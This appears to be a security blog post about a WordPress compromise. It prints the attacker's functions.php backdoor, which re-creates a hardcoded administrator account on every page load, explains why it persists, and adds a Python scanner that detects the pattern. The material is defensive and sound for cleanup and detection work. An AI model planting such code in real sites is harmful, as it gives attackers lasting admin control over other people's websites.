In October, we wrote about how a hacker was able to re-add a malicious user to a hacked WordPress site using a database trigger. That isn’t the only way they can do that, as we found while working on cleaning up a hacked WordPress website recently. In this situation, as soon as a malicious Administrator account was deleted, a new account with the same account information would be created. The cause was code added to the end of the functions.php file for the theme currently in use on the website.
That code was as follows:
```php
// Appended by the attacker to the end of the active theme's functions.php.
add_action( 'init', function () {
    $username      = 'kshivvamaster';
    $password      = 'Admin@2020';
    $email_address = 'kshivva@gmail.com';
    // Runs on every request: if the account is missing, re-create it.
    if ( ! username_exists( $username ) ) {
        $user_id = wp_create_user( $username, $password, $email_address );
        $user    = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
} );
```
The first line hooks the rest of the code to the `init` action, so it runs whenever WordPress loads. The rest of the code checks whether the username “kshivvamaster” exists. If it doesn’t, it creates a new account with that username, along with the password and email address specified in the code, and gives that account the Administrator role. Because `init` fires on every request, deleting the account through the dashboard simply triggers its re-creation on the next page load; the account stays gone only once the code is removed from functions.php.
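As an added example (not code from the original post), a small scanner that flags the pattern described above: any `add_action()` call whose callback both creates a user and grants the administrator role. The sample functions.php it checks is constructed here and includes a benign hook so the scanner's selectivity can be seen.

```python
# Added example, not code from the original post: flag any add_action()
# whose callback both creates a user and grants the administrator role.
import re

HOOK = re.compile(r"\badd_action\s*(\()\s*['\"]([^'\"]+)['\"]")
CREATE_CALL = re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(")
ADMIN_ROLE = re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)"
                        r"|['\"]role['\"]\s*=>\s*['\"]administrator['\"]")


def _call_end(source: str, open_paren: int) -> int:
    """Index just past the ')' matching the '(' at open_paren. Counts parens
    only (a string literal containing one would confuse it), fine for triage."""
    depth = 0
    for i in range(open_paren, len(source)):
        if source[i] == "(":
            depth += 1
        elif source[i] == ")":
            depth -= 1
            if depth == 0:
                return i + 1
    return len(source)


def find_admin_persistence(source: str) -> list:
    """Return (line_number, hook_name) for each add_action() whose arguments
    contain both a user-creation call and an administrator role grant."""
    findings = []
    for m in HOOK.finditer(source):
        body = source[m.start():_call_end(source, m.start(1))]
        if CREATE_CALL.search(body) and ADMIN_ROLE.search(body):
            findings.append((source.count("\n", 0, m.start()) + 1, m.group(2)))
    return findings


# Constructed sample functions.php: one benign hook, then the post's snippet.
SAMPLE_FUNCTIONS_PHP = """<?php
add_action( 'wp_enqueue_scripts', function () {
    wp_enqueue_style( 'theme-style', get_stylesheet_uri() );
} );
add_action( 'init', function () {
    $username = 'kshivvamaster';
    if ( ! username_exists( $username ) ) {
        $user_id = wp_create_user( $username, 'Admin@2020', 'kshivva@gmail.com' );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
} );
"""
```

Running `find_admin_persistence` over every .php file under wp-content (themes and plugins alike) reports the line and hook name of each suspect call; it will not catch obfuscated or base64-decoded variants, so treat it as a triage aid rather than a complete check.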